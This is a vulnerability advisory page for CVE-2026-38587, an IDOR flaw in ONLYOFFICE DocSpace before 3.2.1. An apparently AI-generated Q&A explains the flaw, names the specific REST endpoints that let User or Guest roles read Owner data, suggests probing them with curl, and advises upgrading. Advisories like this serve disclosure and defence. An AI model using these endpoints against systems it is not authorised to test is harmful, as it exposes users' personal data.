CVE-2026-38587
IDOR Vulnerability in ONLYOFFICE DocSpace Exposes Sensitive Data
Publication date: 2026-05-26
Last updated on: 2026-05-26
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| onlyoffice | docspace | to 3.2.1 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-UNKNOWN |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-38587 is an Insecure Direct Object Reference (IDOR) vulnerability found in ONLYOFFICE DocSpace before version 3.2.1. It affects multiple REST API endpoints, allowing authenticated users with low-level permissions such as User or Guest to access sensitive information that should be restricted to administrators.
- Users with restricted roles can retrieve the Owner's unique identifier (ID) via the GET /api/2.0/settings/security/administrator/:productid endpoint.
- They can also access the Owner's profile information through the GET /api/2.0/portal/users/:userID endpoint.
- Additionally, the PUT /api/2.0/people/:userid/contacts method had accessibility issues that could be exploited.
This flaw allows unauthorized users to view confidential user data and compromises the security of the DocSpace environment.
How can this vulnerability impact me? :
This vulnerability can impact you by allowing users with low-level permissions to access sensitive information that should be restricted to administrators. This exposure of confidential data, such as the Owner's unique identifier and profile information, can lead to privacy breaches and potential misuse of that information.
Such unauthorized access could compromise the security and integrity of your ONLYOFFICE DocSpace environment, potentially leading to further exploitation or data leaks.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if users with low-level permissions (User or Guest) are able to access sensitive Owner information via specific REST API endpoints.
- Attempt to access the Owner's unique identifier using the GET request to /api/2.0/settings/security/administrator/:productid.
- Attempt to retrieve the Owner's profile information using the GET request to /api/2.0/portal/users/:userID.
- Check if the PUT request to /api/2.0/people/:userid/contacts is accessible by low-permission users.
These commands can be executed using tools like curl or Postman while authenticated as a User or Guest to verify if unauthorized access is possible.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, immediately update ONLYOFFICE DocSpace to version 3.2.1 or later, where the issue has been fixed to prevent unauthorized access to Owner-level information.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows authenticated users with low-level permissions to access sensitive information such as the Owner's unique identifier and profile information, which should be restricted to administrators.
This unauthorized access to sensitive user data could potentially lead to non-compliance with data protection regulations like GDPR and HIPAA, which require strict controls over access to personal and sensitive information.
Exposing confidential user data through this Insecure Direct Object Reference (IDOR) vulnerability may violate principles of data minimization and access control mandated by these standards.